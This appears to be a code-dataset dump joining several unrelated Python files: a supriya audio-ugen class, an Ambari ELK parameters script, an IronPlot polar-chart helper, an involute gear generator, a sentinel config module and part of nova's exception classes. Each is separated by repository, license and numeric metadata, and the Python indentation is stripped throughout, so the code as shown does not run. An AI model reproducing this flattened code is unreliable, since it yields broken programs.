calculation_rate = synthdeftools.CalculationRate.AUDIO
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
lag_time_d=lag_time_d,
lag_time_u=lag_time_u,
source=source,
)
return ugen
# def coeffs(): ...
@classmethod
def kr(
cls,
lag_time_d=0.1,
lag_time_u=0.1,
source=None,
):
r'''Constructs a control-rate Lag3UD.
::
>>> source = ugentools.In.ar(bus=0)
>>> lag_3_ud = ugentools.Lag3UD.kr(
... lag_time_d=0.1,
... lag_time_u=0.1,
... source=source,
... )
>>> lag_3_ud
Lag3UD.kr()
Returns ugen graph.
'''
from supriya.tools import synthdeftools
calculation_rate = synthdeftools.CalculationRate.CONTROL
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
lag_time_d=lag_time_d,
lag_time_u=lag_time_u,
source=source,
)
return ugen
# def magResponse(): ...
# def magResponse2(): ...
# def magResponse5(): ...
# def magResponseN(): ...
# def scopeResponse(): ...
### PUBLIC PROPERTIES ###
@property
def lag_time_d(self):
r'''Gets `lag_time_d` input of Lag3UD.
::
>>> source = ugentools.In.ar(bus=0)
>>> lag_3_ud = ugentools.Lag3UD.ar(
... lag_time_d=0.1,
... lag_time_u=0.1,
... source=source,
... )
>>> lag_3_ud.lag_time_d
0.1
Returns ugen input.
'''
index = self._ordered_input_names.index('lag_time_d')
return self._inputs[index]
@property
def lag_time_u(self):
r'''Gets `lag_time_u` input of Lag3UD.
::
>>> source = ugentools.In.ar(bus=0)
>>> lag_3_ud = ugentools.Lag3UD.ar(
... lag_time_d=0.1,
... lag_time_u=0.1,
... source=source,
... )
>>> lag_3_ud.lag_time_u
0.1
Returns ugen input.
'''
index = self._ordered_input_names.index('lag_time_u')
return self._inputs[index]
@property
def source(self):
r'''Gets `source` input of Lag3UD.
::
>>> source = ugentools.In.ar(bus=0)
>>> lag_3_ud = ugentools.Lag3UD.ar(
... lag_time_d=0.1,
... lag_time_u=0.1,
... source=source,
... )
>>> lag_3_ud.source
OutputProxy(
source=In(
bus=0.0,
calculation_rate=CalculationRate.AUDIO,
channel_count=1
),
output_index=0
)
Returns ugen input.
'''
index = self._ordered_input_names.index('source')
return self._inputs[index] | mit | 4,332,414,997,754,665,500 | 22.820896 | 71 | 0.448715 | false |
maweina/ambari-elk-service | src/package/scripts/params.py | 1 | 6226 | #!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
#from resource_management.libraries.functions.version import format_hdp_stack_version, compare_versions
from resource_management import *
import status_params
# server configurations
config = Script.get_config()
logstash_user = config['configurations']['logstash-env']['logstash_user']
logstash_user_group = config['configurations']['logstash-env']['logstash_user_group']
elastic_user = config['configurations']['elastic-env']['elastic_user']
elastic_user_group = config['configurations']['elastic-env']['elastic_user_group']
kibana_user = config['configurations']['kibana-env']['kibana_user']
kibana_user_group = config['configurations']['kibana-env']['kibana_user_group']
elastic_home = "/usr/share/elasticsearch"
elastic_plugins = "/usr/share/elasticsearch/plugins"
elastic_bin = "/usr/share/elasticsearch/bin"
elastic_script_dir = "/etc/elasticsearch/scripts"
elastic_conf_dir = "/etc/elasticsearch"
elastic_data_dir = config['configurations']['elasticsearch-site']['path.data']
elastic_log_dir = config['configurations']['elasticsearch-site']['path.logs']
logstash_home = "/opt/logstash"
logstash_bin = "/opt/logstash/bin"
logstash_conf_dir = "/etc/logstash/conf.d"
logstash_log_dir = "/var/log/logstash"
logstash_sincedb_path = format("{logstash_log_dir}/.sincedb2")
kibana_home = "/opt/kibana"
kibana_bin = "/opt/kibana/bin"
kibana_conf_dir = "/opt/kibana/config"
kibana_log_dir = config['configurations']['kibana-site']['logging.dest']
logstash_pid_dir = status_params.logstash_pid_dir
logstash_pid_file = status_params.logstash_pid_file
elastic_pid_dir = status_params.elastic_pid_dir
elastic_pid_file = status_params.elastic_pid_file
kibana_pid_dir = status_params.kibana_pid_dir
kibana_pid_file = status_params.kibana_pid_file
hdfs_log_dir_prefix = ""
hdfs_user = ""
if 'hadoop-env' in config['configurations']:
if 'hdfs_log_dir_prefix' in config['configurations']['hadoop-env']:
hdfs_log_dir_prefix = config['configurations']['hadoop-env']['hdfs_log_dir_prefix']
if 'hdfs_user' in config['configurations']['hadoop-env']:
hdfs_user = config['configurations']['hadoop-env']['hdfs_user']
yarn_log_dir_prefix = ""
yarn_user = ""
if 'yarn-env' in config['configurations']:
if 'yarn_log_dir_prefix' in config['configurations']['yarn-env']:
yarn_log_dir_prefix = config['configurations']['yarn-env']['yarn_log_dir_prefix']
if 'yarn_user' in config['configurations']['yarn-env']:
yarn_user = config['configurations']['yarn-env']['yarn_user']
hbase_log_dir = ""
if 'hbase-env' in config['configurations'] and 'hbase_log_dir' in config['configurations']['hbase-env']:
hbase_log_dir = config['configurations']['hbase-env']['hbase_log_dir']
zk_log_dir = ""
if 'zookeeper-env' in config['configurations'] and 'zk_log_dir' in config['configurations']['zookeeper-env']:
zk_log_dir = config['configurations']['zookeeper-env']['zk_log_dir']
hive_log_dir = ""
webhcat_log_dir = ""
if 'hive-env' in config['configurations']:
if 'hive_log_dir' in config['configurations']['hive-env']:
hive_log_dir = config['configurations']['hive-env']['hive_log_dir']
if 'hcat_log_dir' in config['configurations']['hive-env']:
webhcat_log_dir = config['configurations']['hive-env']['hcat_log_dir']
rm_host = ""
if 'clusterHostInfo' in config and 'rm_host' in config['clusterHostInfo']:
rm_hosts = config['clusterHostInfo']['rm_host']
rm_host = rm_hosts[0]
else:
rm_hosts = default("/clusterHostInfo/rm_host", None)
if type(rm_hosts) is list:
rm_host = rm_hosts[0]
else:
rm_host = rm_hosts
rm_port = 8088
if 'yarn-site' in config['configurations'] and 'yarn.resourcemanager.webapp.address' in config['configurations']['yarn-site'] and ':' in config['configurations']['yarn-site']['yarn.resourcemanager.webapp.address']:
rm_port = config['configurations']['yarn-site']['yarn.resourcemanager.webapp.address'].split(':')[-1]
hostname = config['hostname']
java64_home = config['hostLevelParams']['java_home']
elastic_cluster_name = config['configurations']['elasticsearch-site']['cluster.name']
elastic_port = config['configurations']['elasticsearch-site']['http.port']
kibana_port = config['configurations']['kibana-site']['server.port']
kinana_index = config['configurations']['kibana-site']['kibana.index']
if (('logstash-data-source' in config['configurations']) and ('content' in config['configurations']['logstash-data-source'])):
logstash_conf = config['configurations']['logstash-data-source']['content']
else:
logstash_conf = None
elastic_data_hosts = []
if 'clusterHostInfo' in config and 'elastic_datanode_hosts' in config['clusterHostInfo']:
elastic_data_hosts = config['clusterHostInfo']['elastic_datanode_hosts']
es_host = elastic_data_hosts[0]
else:
elastic_data_hosts = default("/clusterHostInfo/elastic_datanode_hosts", None)
if type(elastic_data_hosts) is list:
es_host = elastic_data_hosts[0]
else:
es_host = elastic_data_hosts
if 'clusterHostInfo' in config and 'kibana_server_hosts' in config['clusterHostInfo']:
kibana_server_hosts = config['clusterHostInfo']['kibana_server_hosts']
kibana_host = kibana_server_hosts[0]
else:
kibana_server_hosts = default("/clusterHostInfo/kibana_server_hosts", None)
if type(kibana_server_hosts) is list:
kibana_host = kibana_server_hosts[0]
else:
kibana_host = kibana_server_hosts | apache-2.0 | -8,679,180,408,679,117,000 | 43.163121 | 214 | 0.716511 | false |
rwg0/ironlab | ILabPythonLib/ironplot/ironplot_mscharts.py | 1 | 1682 | from ironplot_windows import *
import clr
import System
import System.Windows.Controls
from System.Windows.Controls import *
clr.AddReferenceByPartialName("System.Windows.Forms.DataVisualization")
clr.AddReferenceByPartialName("System.Drawing")
clr.AddReferenceToFile("IronPlot.dll")
import System.Windows.Forms.DataVisualization as dv
import System.Drawing as dr
from System.Windows import Thickness, Visibility
from IronPlot import *
from IronPlot.Plotting3D import Plot3D
floatarray = System.Array[float]
numpyAvailable = True
try:
import numpy as np
except ImportError:
numpyAvailable = False
def radial(theta, r, **kwargs):
""" Create a radial plot (or overwite current plot if hold is set)
"""
if len(theta) != len(r):
raise ValueError('Arrays must be of the same length.')
if PlotContext.CurrentWindowIndex == None:
PlotContext.OpenNextWindow()
if (PlotContext.CurrentPlot == None) or (PlotContext.HoldState == False):
        # New plot or overwrite plot
host = MSChartHost()
chart = host.Chart
chartArea = dv.Charting.ChartArea(Name = "Default")
chart.ChartAreas.Add(chartArea)
PlotContext.AddPlot(host)
else:
# Add to current plot
chart = PlotContext.CurrentPlot.Chart
seriesName = "Series" + str(chart.Series.Count)
series = dv.Charting.Series(ChartType = dv.Charting.SeriesChartType.Polar, Name = seriesName)
chart.Series.Add(series)
for a, b in zip(theta, r):
chart.Series[seriesName].Points.AddXY(float(a), float(b))
# Apply kwargs
setprops(series, **kwargs)
return series | lgpl-3.0 | -5,491,246,122,984,367,000 | 31.68 | 96 | 0.708086 | false |
DaveBerkeley/lasercut | laser/gears.py | 1 | 3508 | #!/usr/bin/python
import sys
import math
from laser import Polygon, Circle, Collection, Config
from laser import radians, rotate_2d
from render import DXF as dxf
# Involute gears, see :
# http://www.cartertools.com/involute.html
#
#
def circle_intersect(v, r):
# see http://mathworld.wolfram.com/Circle-LineIntersection.html
x1, y1 = v.points[-2]
x2, y2 = v.points[-1]
dx = x1 - x2
dy = y1 - y2
dr = math.sqrt((dx * dx) + (dy * dy))
D = (x1 * y2) - (x2 * y1)
    def sgn(a):
        # fixed at -1 on purpose: only one of the two chord/circle intersections is wanted here
        return -1
x = -((D * dy) - (sgn(dy)*dx*math.sqrt(((r*r)*(dr*dr))-(D*D)))) / (dr*dr)
y = -((-D*dx) - (abs(dy)* math.sqrt(((r*r)*(dr*dr))-(D*D)))) / (dr*dr)
# truncate the last line segment to fit the radius
v.points[-1] = x, y
#
#
def make_involute(pitch_dia, N, PA=20.0, teeth=None):
m = float(pitch_dia) / N
P = 1.0 / m
D = N / P # Pitch Diameter
R = D / 2.0 # Pitch Radius
DB = D * math.cos(radians(PA)) # Base Circle Diameter
RB = DB / 2.0 # Base Circle Radius
a = 1.0 / P # Addendum
d = 1.157 / P # Dedendum
DO = D + (2 * a) # Outside Diameter
RO = DO / 2.0 # Outside Radius
DR = D - (2 * d) # Root Diameter
RR = DR / 2.0 # Root Radius
CB = math.pi * DB # Circumference of Base Circle
fcb = RB / 20.0
ncb = CB / fcb
acb = 360 / ncb
gt = 360.0 / N # Gear Tooth Spacing
info = {
"outside_dia" : DO,
"pitch_dia" : D,
"root_dia" : DR,
}
v = Polygon()
v.add(0, RR)
# generate involute curve points where
    # radius is between the D and DO circles
first = None
for i in range(20):
x, y = i * RB / 20.0, RB
x, y = rotate_2d(radians(i * acb), x, y)
r = abs(complex(x, y))
if r < R:
first = x, y
continue
if first:
v.add(*first)
first = None
v.add(x, y)
if r > RO:
break
# need to trim last involute line segment
# so it doesn't exceed the outside_radius
circle_intersect(v, RO)
# rotate back 1/4 tooth
v.rotate(-gt / 4.0)
# add reflection to itself
w = v.copy()
w.reflect_v()
# make sure the halves are joined correctly
w.points.reverse()
v.add_poly(w)
work = Polygon()
work.info = info
# add all the teeth to the work
for i in range(teeth or N):
c = v.copy()
c.rotate(gt * i)
work.add_poly(c)
# join the ends together
if teeth is None:
work.close()
return work
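# Worked example (follows directly from the formulas above): make_involute(20, 20)
# gives m = 1 and P = 1, so info = {'outside_dia': 22.0, 'pitch_dia': 20.0,
# 'root_dia': 17.686} and one tooth every gt = 18 degrees.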
#
#
if __name__ == "__main__":
x_margin = 10
y_margin = 20
draw = False
if len(sys.argv) > 1:
draw = True
def commit(work):
#work.translate(x_margin, y_margin)
work.draw(drawing, config.cut())
config = Config()
drawing = dxf.drawing("test.dxf")
N = 20
PA = 20.0
pitch_dia = 20
nteeth = None # 6 # set if only some teeth required
work = make_involute(pitch_dia, N, PA, teeth=nteeth)
if nteeth:
work.add(0, 0)
work.close()
if draw:
for label in [ "outside_dia", "root_dia", "pitch_dia" ]:
d = work.info[label]
c = Circle((0, 0), d / 2.0, colour=Config.draw_colour)
work.add(c)
commit(work)
drawing.save()
# FIN
| gpl-2.0 | -6,214,801,681,637,845,000 | 22.702703 | 77 | 0.498575 | false |
spjmurray/openstack-sentinel | sentinel/conf/opts.py | 1 | 1449 | # Copyright 2017 DataCentred Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import importlib
from oslo_config import cfg
MODULES = [
'sentinel.clients',
'sentinel.log',
'sentinel.tests.functional.base',
'sentinel.whitelist',
]
def list_opts():
opts = []
for module_name in MODULES:
module = importlib.import_module(module_name)
group = None
if module.OPTS_GROUP:
group = module.OPTS_GROUP.name
opts.append((group, module.OPTS))
return opts
def configure():
conf = cfg.ConfigOpts()
for module_name in MODULES:
module = importlib.import_module(module_name)
group = None
if module.OPTS_GROUP:
group = module.OPTS_GROUP.name
conf.register_group(module.OPTS_GROUP)
conf.register_opts(module.OPTS, group=group)
conf([], project='sentinel')
return conf
# vi: ts=4 et:
| apache-2.0 | 1,883,553,916,626,965,200 | 25.345455 | 78 | 0.661836 | false |
zestrada/nova-cs498cc | nova/exception.py | 1 | 34128 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Nova base exception handling.
Includes decorator for re-raising Nova-type exceptions.
SHOULD include dedicated exception logging.
"""
import functools
from oslo.config import cfg
import webob.exc
from nova.openstack.common import excutils
from nova.openstack.common import log as logging
from nova import safe_utils
LOG = logging.getLogger(__name__)
exc_log_opts = [
cfg.BoolOpt('fatal_exception_format_errors',
default=False,
help='make exception message format errors fatal'),
]
CONF = cfg.CONF
CONF.register_opts(exc_log_opts)
class ConvertedException(webob.exc.WSGIHTTPException):
def __init__(self, code=0, title="", explanation=""):
self.code = code
self.title = title
self.explanation = explanation
super(ConvertedException, self).__init__()
class ProcessExecutionError(IOError):
def __init__(self, stdout=None, stderr=None, exit_code=None, cmd=None,
description=None):
self.exit_code = exit_code
self.stderr = stderr
self.stdout = stdout
self.cmd = cmd
self.description = description
if description is None:
description = _('Unexpected error while running command.')
if exit_code is None:
exit_code = '-'
message = _('%(description)s\nCommand: %(cmd)s\n'
'Exit code: %(exit_code)s\nStdout: %(stdout)r\n'
'Stderr: %(stderr)r') % locals()
IOError.__init__(self, message)
def _cleanse_dict(original):
"""Strip all admin_password, new_pass, rescue_pass keys from a dict."""
return dict((k, v) for k, v in original.iteritems() if not "_pass" in k)
def wrap_exception(notifier=None, publisher_id=None, event_type=None,
level=None):
"""This decorator wraps a method to catch any exceptions that may
get thrown. It logs the exception as well as optionally sending
it to the notification system.
"""
# TODO(sandy): Find a way to import nova.notifier.api so we don't have
# to pass it in as a parameter. Otherwise we get a cyclic import of
# nova.notifier.api -> nova.utils -> nova.exception :(
def inner(f):
def wrapped(self, context, *args, **kw):
# Don't store self or context in the payload, it now seems to
# contain confidential information.
try:
return f(self, context, *args, **kw)
except Exception, e:
with excutils.save_and_reraise_exception():
if notifier:
payload = dict(exception=e)
call_dict = safe_utils.getcallargs(f, *args, **kw)
cleansed = _cleanse_dict(call_dict)
payload.update({'args': cleansed})
# Use a temp vars so we don't shadow
# our outer definitions.
temp_level = level
if not temp_level:
temp_level = notifier.ERROR
temp_type = event_type
if not temp_type:
# If f has multiple decorators, they must use
# functools.wraps to ensure the name is
# propagated.
temp_type = f.__name__
notifier.notify(context, publisher_id, temp_type,
temp_level, payload)
return functools.wraps(f)(wrapped)
return inner
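# Usage sketch (the notifier object and method below are illustrative, not part of
# this module). Decorated methods must accept (self, context, ...):
#
#   @wrap_exception(notifier=notifier, publisher_id="compute.host1")
#   def resize_instance(self, context, instance, flavor):
#       ...
#
# Any exception raised inside is notified with a cleansed copy of the call
# arguments and then re-raised unchanged.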
class NovaException(Exception):
"""Base Nova Exception
To correctly use this class, inherit from it and define
a 'message' property. That message will get printf'd
with the keyword arguments provided to the constructor.
"""
message = _("An unknown exception occurred.")
code = 500
headers = {}
safe = False
def __init__(self, message=None, **kwargs):
self.kwargs = kwargs
if 'code' not in self.kwargs:
try:
self.kwargs['code'] = self.code
except AttributeError:
pass
if not message:
try:
message = self.message % kwargs
except Exception as e:
# kwargs doesn't match a variable in the message
# log the issue and the kwargs
LOG.exception(_('Exception in string format operation'))
for name, value in kwargs.iteritems():
LOG.error("%s: %s" % (name, value))
if CONF.fatal_exception_format_errors:
raise e
else:
# at least get the core message out if something happened
message = self.message
super(NovaException, self).__init__(message)
def format_message(self):
if self.__class__.__name__.endswith('_Remote'):
return self.args[0]
else:
return unicode(self)
class EC2APIError(NovaException):
message = _("Unknown")
def __init__(self, message=None, code=None):
self.msg = message
self.code = code
outstr = '%s' % message
super(EC2APIError, self).__init__(outstr)
class EncryptionFailure(NovaException):
message = _("Failed to encrypt text: %(reason)s")
class DecryptionFailure(NovaException):
message = _("Failed to decrypt text: %(reason)s")
class VirtualInterfaceCreateException(NovaException):
message = _("Virtual Interface creation failed")
class VirtualInterfaceMacAddressException(NovaException):
message = _("5 attempts to create virtual interface"
"with unique mac address failed")
class GlanceConnectionFailed(NovaException):
message = _("Connection to glance host %(host)s:%(port)s failed: "
"%(reason)s")
class NotAuthorized(NovaException):
message = _("Not authorized.")
code = 403
class AdminRequired(NotAuthorized):
message = _("User does not have admin privileges")
class PolicyNotAuthorized(NotAuthorized):
message = _("Policy doesn't allow %(action)s to be performed.")
class ImageNotActive(NovaException):
message = _("Image %(image_id)s is not active.")
class ImageNotAuthorized(NovaException):
message = _("Not authorized for image %(image_id)s.")
class Invalid(NovaException):
message = _("Unacceptable parameters.")
code = 400
class InvalidBDM(Invalid):
message = _("Block Device Mapping is Invalid.")
class InvalidBDMSnapshot(InvalidBDM):
message = _("Block Device Mapping is Invalid: "
"failed to get snapshot %(id)s.")
class InvalidBDMVolume(InvalidBDM):
message = _("Block Device Mapping is Invalid: "
"failed to get volume %(id)s.")
class VolumeUnattached(Invalid):
message = _("Volume %(volume_id)s is not attached to anything")
class VolumeNotCreated(NovaException):
message = _("Volume %(volume_id)s did not finish being created"
" even after we waited %(seconds)s seconds or %(attempts)s"
" attempts.")
class InvalidKeypair(Invalid):
message = _("Keypair data is invalid")
class InvalidRequest(Invalid):
message = _("The request is invalid.")
class InvalidInput(Invalid):
message = _("Invalid input received") + ": %(reason)s"
class InvalidVolume(Invalid):
message = _("Invalid volume") + ": %(reason)s"
class InvalidMetadata(Invalid):
message = _("Invalid metadata") + ": %(reason)s"
class InvalidMetadataSize(Invalid):
message = _("Invalid metadata size") + ": %(reason)s"
class InvalidPortRange(Invalid):
message = _("Invalid port range %(from_port)s:%(to_port)s. %(msg)s")
class InvalidIpProtocol(Invalid):
message = _("Invalid IP protocol %(protocol)s.")
class InvalidContentType(Invalid):
message = _("Invalid content type %(content_type)s.")
class InvalidCidr(Invalid):
message = _("Invalid cidr %(cidr)s.")
class InvalidUnicodeParameter(Invalid):
message = _("Invalid Parameter: "
"Unicode is not supported by the current database.")
# Cannot be templated as the error syntax varies.
# msg needs to be constructed when raised.
class InvalidParameterValue(Invalid):
message = _("%(err)s")
class InvalidAggregateAction(Invalid):
message = _("Cannot perform action '%(action)s' on aggregate "
"%(aggregate_id)s. Reason: %(reason)s.")
class InvalidGroup(Invalid):
message = _("Group not valid. Reason: %(reason)s")
class InvalidSortKey(Invalid):
message = _("Sort key supplied was not valid.")
class InstanceInvalidState(Invalid):
message = _("Instance %(instance_uuid)s in %(attr)s %(state)s. Cannot "
"%(method)s while the instance is in this state.")
class InstanceNotRunning(Invalid):
message = _("Instance %(instance_id)s is not running.")
class InstanceNotInRescueMode(Invalid):
message = _("Instance %(instance_id)s is not in rescue mode")
class InstanceNotRescuable(Invalid):
message = _("Instance %(instance_id)s cannot be rescued: %(reason)s")
class InstanceNotReady(Invalid):
message = _("Instance %(instance_id)s is not ready")
class InstanceSuspendFailure(Invalid):
message = _("Failed to suspend instance") + ": %(reason)s"
class InstanceResumeFailure(Invalid):
message = _("Failed to resume instance: %(reason)s.")
class InstancePowerOnFailure(Invalid):
message = _("Failed to power on instance: %(reason)s.")
class InstancePowerOffFailure(Invalid):
message = _("Failed to power off instance: %(reason)s.")
class InstanceRebootFailure(Invalid):
message = _("Failed to reboot instance") + ": %(reason)s"
class InstanceTerminationFailure(Invalid):
message = _("Failed to terminate instance") + ": %(reason)s"
class InstanceDeployFailure(Invalid):
message = _("Failed to deploy instance") + ": %(reason)s"
class ServiceUnavailable(Invalid):
message = _("Service is unavailable at this time.")
class ComputeResourcesUnavailable(ServiceUnavailable):
message = _("Insufficient compute resources.")
class ComputeServiceUnavailable(ServiceUnavailable):
message = _("Compute service of %(host)s is unavailable at this time.")
class UnableToMigrateToSelf(Invalid):
message = _("Unable to migrate instance (%(instance_id)s) "
"to current host (%(host)s).")
class InvalidHypervisorType(Invalid):
message = _("The supplied hypervisor type of is invalid.")
class DestinationHypervisorTooOld(Invalid):
message = _("The instance requires a newer hypervisor version than "
"has been provided.")
class DestinationDiskExists(Invalid):
message = _("The supplied disk path (%(path)s) already exists, "
"it is expected not to exist.")
class InvalidDevicePath(Invalid):
message = _("The supplied device path (%(path)s) is invalid.")
class DevicePathInUse(Invalid):
message = _("The supplied device path (%(path)s) is in use.")
code = 409
class DeviceIsBusy(Invalid):
message = _("The supplied device (%(device)s) is busy.")
class InvalidCPUInfo(Invalid):
message = _("Unacceptable CPU info") + ": %(reason)s"
class InvalidIpAddressError(Invalid):
message = _("%(address)s is not a valid IP v4/6 address.")
class InvalidVLANTag(Invalid):
message = _("VLAN tag is not appropriate for the port group "
"%(bridge)s. Expected VLAN tag is %(tag)s, "
"but the one associated with the port group is %(pgroup)s.")
class InvalidVLANPortGroup(Invalid):
message = _("vSwitch which contains the port group %(bridge)s is "
"not associated with the desired physical adapter. "
"Expected vSwitch is %(expected)s, but the one associated "
"is %(actual)s.")
class InvalidDiskFormat(Invalid):
message = _("Disk format %(disk_format)s is not acceptable")
class ImageUnacceptable(Invalid):
message = _("Image %(image_id)s is unacceptable: %(reason)s")
class InstanceUnacceptable(Invalid):
message = _("Instance %(instance_id)s is unacceptable: %(reason)s")
class InvalidEc2Id(Invalid):
message = _("Ec2 id %(ec2_id)s is unacceptable.")
class InvalidUUID(Invalid):
message = _("Expected a uuid but received %(uuid)s.")
class InvalidID(Invalid):
message = _("Invalid ID received %(id)s.")
class InvalidPeriodicTaskArg(Invalid):
message = _("Unexpected argument for periodic task creation: %(arg)s.")
class ConstraintNotMet(NovaException):
message = _("Constraint not met.")
code = 412
class NotFound(NovaException):
message = _("Resource could not be found.")
code = 404
class AgentBuildNotFound(NotFound):
message = _("No agent-build associated with id %(id)s.")
class VolumeNotFound(NotFound):
message = _("Volume %(volume_id)s could not be found.")
class SnapshotNotFound(NotFound):
message = _("Snapshot %(snapshot_id)s could not be found.")
class ISCSITargetNotFoundForVolume(NotFound):
message = _("No target id found for volume %(volume_id)s.")
class DiskNotFound(NotFound):
message = _("No disk at %(location)s")
class VolumeDriverNotFound(NotFound):
message = _("Could not find a handler for %(driver_type)s volume.")
class InvalidImageRef(Invalid):
message = _("Invalid image href %(image_href)s.")
class ImageNotFound(NotFound):
message = _("Image %(image_id)s could not be found.")
class ImageNotFoundEC2(ImageNotFound):
message = _("Image %(image_id)s could not be found. The nova EC2 API "
"assigns image ids dynamically when they are listed for the "
"first time. Have you listed image ids since adding this "
"image?")
class ProjectNotFound(NotFound):
message = _("Project %(project_id)s could not be found.")
class StorageRepositoryNotFound(NotFound):
message = _("Cannot find SR to read/write VDI.")
class NetworkDuplicated(NovaException):
message = _("Network %(network_id)s is duplicated.")
class NetworkInUse(NovaException):
message = _("Network %(network_id)s is still in use.")
class NetworkNotCreated(NovaException):
message = _("%(req)s is required to create a network.")
class NetworkNotFound(NotFound):
message = _("Network %(network_id)s could not be found.")
class PortNotFound(NotFound):
message = _("Port id %(port_id)s could not be found.")
class NetworkNotFoundForBridge(NetworkNotFound):
message = _("Network could not be found for bridge %(bridge)s")
class NetworkNotFoundForUUID(NetworkNotFound):
message = _("Network could not be found for uuid %(uuid)s")
class NetworkNotFoundForCidr(NetworkNotFound):
message = _("Network could not be found with cidr %(cidr)s.")
class NetworkNotFoundForInstance(NetworkNotFound):
message = _("Network could not be found for instance %(instance_id)s.")
class NoNetworksFound(NotFound):
message = _("No networks defined.")
class NetworkNotFoundForProject(NotFound):
message = _("Either Network uuid %(network_uuid)s is not present or "
"is not assigned to the project %(project_id)s.")
class DatastoreNotFound(NotFound):
message = _("Could not find the datastore reference(s) which the VM uses.")
class PortInUse(NovaException):
message = _("Port %(port_id)s is still in use.")
class PortNotUsable(NovaException):
message = _("Port %(port_id)s not usable for instance %(instance)s.")
class PortNotFree(NovaException):
message = _("No free port available for instance %(instance)s.")
class FixedIpNotFound(NotFound):
message = _("No fixed IP associated with id %(id)s.")
class FixedIpNotFoundForAddress(FixedIpNotFound):
message = _("Fixed ip not found for address %(address)s.")
class FixedIpNotFoundForInstance(FixedIpNotFound):
message = _("Instance %(instance_uuid)s has zero fixed ips.")
class FixedIpNotFoundForNetworkHost(FixedIpNotFound):
message = _("Network host %(host)s has zero fixed ips "
"in network %(network_id)s.")
class FixedIpNotFoundForSpecificInstance(FixedIpNotFound):
message = _("Instance %(instance_uuid)s doesn't have fixed ip '%(ip)s'.")
class FixedIpNotFoundForNetwork(FixedIpNotFound):
message = _("Fixed IP address (%(address)s) does not exist in "
"network (%(network_uuid)s).")
class FixedIpAlreadyInUse(NovaException):
message = _("Fixed IP address %(address)s is already in use on instance "
"%(instance_uuid)s.")
class FixedIpAssociatedWithMultipleInstances(NovaException):
message = _("More than one instance is associated with fixed ip address "
"'%(address)s'.")
class FixedIpInvalid(Invalid):
message = _("Fixed IP address %(address)s is invalid.")
class NoMoreFixedIps(NovaException):
message = _("Zero fixed ips available.")
class NoFixedIpsDefined(NotFound):
message = _("Zero fixed ips could be found.")
#TODO(bcwaldon): EOL this exception!
class Duplicate(NovaException):
pass
class FloatingIpExists(Duplicate):
message = _("Floating ip %(address)s already exists.")
class FloatingIpNotFound(NotFound):
message = _("Floating ip not found for id %(id)s.")
class FloatingIpDNSExists(Invalid):
message = _("The DNS entry %(name)s already exists in domain %(domain)s.")
class FloatingIpNotFoundForAddress(FloatingIpNotFound):
message = _("Floating ip not found for address %(address)s.")
class FloatingIpNotFoundForHost(FloatingIpNotFound):
message = _("Floating ip not found for host %(host)s.")
class FloatingIpMultipleFoundForAddress(NovaException):
message = _("Multiple floating ips are found for address %(address)s.")
class FloatingIpPoolNotFound(NotFound):
message = _("Floating ip pool not found.")
safe = True
class NoMoreFloatingIps(FloatingIpNotFound):
message = _("Zero floating ips available.")
safe = True
class FloatingIpAssociated(NovaException):
message = _("Floating ip %(address)s is associated.")
class FloatingIpNotAssociated(NovaException):
message = _("Floating ip %(address)s is not associated.")
class NoFloatingIpsDefined(NotFound):
message = _("Zero floating ips exist.")
class NoFloatingIpInterface(NotFound):
message = _("Interface %(interface)s not found.")
class CannotDisassociateAutoAssignedFloatingIP(NovaException):
message = _("Cannot disassociate auto assigined floating ip")
class KeypairNotFound(NotFound):
message = _("Keypair %(name)s not found for user %(user_id)s")
class CertificateNotFound(NotFound):
message = _("Certificate %(certificate_id)s not found.")
class ServiceNotFound(NotFound):
message = _("Service %(service_id)s could not be found.")
class HostNotFound(NotFound):
message = _("Host %(host)s could not be found.")
class ComputeHostNotFound(HostNotFound):
message = _("Compute host %(host)s could not be found.")
class HostBinaryNotFound(NotFound):
message = _("Could not find binary %(binary)s on host %(host)s.")
class InvalidReservationExpiration(Invalid):
message = _("Invalid reservation expiration %(expire)s.")
class InvalidQuotaValue(Invalid):
message = _("Change would make usage less than 0 for the following "
"resources: %(unders)s")
class QuotaNotFound(NotFound):
message = _("Quota could not be found")
class QuotaResourceUnknown(QuotaNotFound):
message = _("Unknown quota resources %(unknown)s.")
class ProjectQuotaNotFound(QuotaNotFound):
message = _("Quota for project %(project_id)s could not be found.")
class QuotaClassNotFound(QuotaNotFound):
message = _("Quota class %(class_name)s could not be found.")
class QuotaUsageNotFound(QuotaNotFound):
message = _("Quota usage for project %(project_id)s could not be found.")
class ReservationNotFound(QuotaNotFound):
message = _("Quota reservation %(uuid)s could not be found.")
class OverQuota(NovaException):
message = _("Quota exceeded for resources: %(overs)s")
class SecurityGroupNotFound(NotFound):
message = _("Security group %(security_group_id)s not found.")
class SecurityGroupNotFoundForProject(SecurityGroupNotFound):
message = _("Security group %(security_group_id)s not found "
"for project %(project_id)s.")
class SecurityGroupNotFoundForRule(SecurityGroupNotFound):
message = _("Security group with rule %(rule_id)s not found.")
class SecurityGroupExistsForInstance(Invalid):
message = _("Security group %(security_group_id)s is already associated"
" with the instance %(instance_id)s")
